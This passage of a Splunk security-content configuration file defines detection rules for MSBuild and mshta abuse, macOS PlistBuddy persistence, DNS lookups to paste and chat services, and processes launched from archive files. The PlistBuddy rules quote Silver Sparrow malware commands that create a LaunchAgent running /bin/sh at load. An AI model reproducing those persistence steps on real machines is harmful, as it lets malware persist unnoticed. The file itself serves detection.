identifies renamed instances of msbuild.exe executing. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. During investigation, identify the code executed and what is executing a renamed instance of MSBuild. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of msbuild, triggering a false positive. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious MSBuild Rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious MSBuild Rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=msbuild.exe AND Processes.original_file_name=MSBuild.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_msbuild_rename_filter` [ESCU - Suspicious MSBuild Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127", "T1127.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. action.escu.creation_date = 2021-01-12 action.escu.modification_date = 2021-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious MSBuild Spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Suspicious msbuild.exe process executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious MSBuild Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127", "T1127.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies wmiprvse.exe spawning msbuild.exe. This behavior is indicative of a COM object being utilized to spawn msbuild from wmiprvse.exe. It is common for MSBuild.exe to be spawned from devenv.exe while using Visual Studio. In this instance, there will be command line arguments and file paths. In a malicious instance, MSBuild.exe will spawn from non-standard processes and have no command line arguments. For example, MSBuild.exe spawning from explorer.exe, powershell.exe is far less common and should be investigated. action.notable.param.rule_title = Suspicious MSBuild Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wmiprvse.exe AND `process_msbuild` by Processes.dest Processes.parent_process Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_msbuild_spawn_filter` [ESCU - Suspicious mshta child process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious mshta child process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = suspicious mshta child process detected on host $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious mshta child process - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies child processes spawning from "mshta.exe". The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, parent process "mshta.exe" and its child process. action.notable.param.rule_title = Suspicious mshta child process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=mshta.exe AND (Processes.process_name=powershell.exe OR Processes.process_name=colorcpl.exe OR Processes.process_name=msbuild.exe OR Processes.process_name=microsoft.workflow.compiler.exe OR Processes.process_name=searchprotocolhost.exe OR Processes.process_name=scrcons.exe OR Processes.process_name=cscript.exe OR Processes.process_name=wscript.exe OR Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe) by Processes.dest Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_mshta_child_process_filter` [ESCU - Suspicious mshta spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. action.escu.creation_date = 2021-01-20 action.escu.modification_date = 2021-01-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious mshta spawn - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = mshta.exe spawned by wmiprvse.exe on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious mshta spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe. action.notable.param.rule_title = Suspicious mshta spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=svchost.exe OR Processes.parent_process_name=wmiprvse.exe) AND `process_mshta` by Processes.dest Processes.parent_process Processes.user Processes.original_file_name| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_mshta_spawn_filter` [ESCU - Suspicious PlistBuddy Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate applications may use PlistBuddy to create or modify property lists and possibly generate false positives. Review the property list being modified or created to confirm. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious PlistBuddy Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Silver Sparrow"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious PlistBuddy Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.notable.param.rule_title = Suspicious PlistBuddy Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=PlistBuddy (Processes.process=*LaunchAgents* OR Processes.process=*RunAtLoad* OR Processes.process=*true*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_plistbuddy_usage_filter` [ESCU - Suspicious PlistBuddy Usage via OSquery - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.escu.how_to_implement = OSQuery must be installed and configured to pick up process events (info at https://osquery.io) as well as using the Splunk OSQuery Add-on https://splunkbase.splunk.com/app/4402. Modify the macro and validate fields are correct. action.escu.known_false_positives = Some legitimate applications may use PlistBuddy to create or modify property lists and possibly generate false positives. Review the property list being modified or created to confirm. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious PlistBuddy Usage via OSquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Silver Sparrow"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious PlistBuddy Usage via OSquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.001", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a native MacOS utility, PlistBuddy, creating or modifying a properly list (.plist) file. In the instance of Silver Sparrow, the following commands were executed:\ - PlistBuddy -c "Add :Label string init_verx" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :RunAtLoad bool true" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :StartInterval integer 3600" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments array" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:0 string /bin/sh" ~/Library/Launchagents/init_verx.plist \ - PlistBuddy -c "Add :ProgramArguments:1 string -c" ~/Library/Launchagents/init_verx.plist \ Upon triage, capture the property list file being written to disk and review for further indicators. Contain the endpoint and triage further. action.notable.param.rule_title = Suspicious PlistBuddy Usage via OSquery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery_process` "columns.cmdline"="*LaunchAgents*" OR "columns.cmdline"="*RunAtLoad*" OR "columns.cmdline"="*true*" | `suspicious_plistbuddy_usage_via_osquery_filter` [ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.escu.how_to_implement = This detection relies on sysmon logs with the Event ID 22, DNS Query. We suggest you run this detection at least once a day over the last 14 days. action.escu.known_false_positives = Noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. In this case, a filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate", "Remcos", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = suspicious process $process_name$ has a dns query in $QueryName$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process DNS Query Known Abuse Web Services - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate", "Remcos", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a suspicious process making a DNS query via known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms used to download external files. This technique is abused by adversaries, malware actors, and red teams to download a malicious file on the target host. This is a good TTP indicator for possible initial access techniques. A user will experience false positives if the following instant messaging is allowed or common applications like telegram or discord are allowed in the corporate network. action.notable.param.rule_title = Suspicious Process DNS Query Known Abuse Web Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*pastebin*", "*discord*", "*api.telegram*","*t.me*") process_name IN ("cmd.exe", "*powershell*", "pwsh.exe", "wscript.exe","cscript.exe") OR Image IN ("*\\users\\public\\*", "*\\programdata\\*", "*\\temp\\*", "*\\Windows\\Tasks\\*", "*\\appdata\\*", "*\\perflogs\\*") | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_dns_query_known_abuse_web_services_filter` [ESCU - Suspicious Process Executed From Container File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1204.002", "T1036.008"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Various business process or userland applications and behavior. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process Executed From Container File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Amadey", "Remcos", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ was launched from $file_name$ on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 16}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process Executed From Container File - Rule action.correlationsearch.annotations = {"analytic_story": ["Unusual Processes", "Amadey", "Remcos", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 20, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1204.002", "T1036.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious process spawned by another process from within common container/archive file types. This technique was a common technique 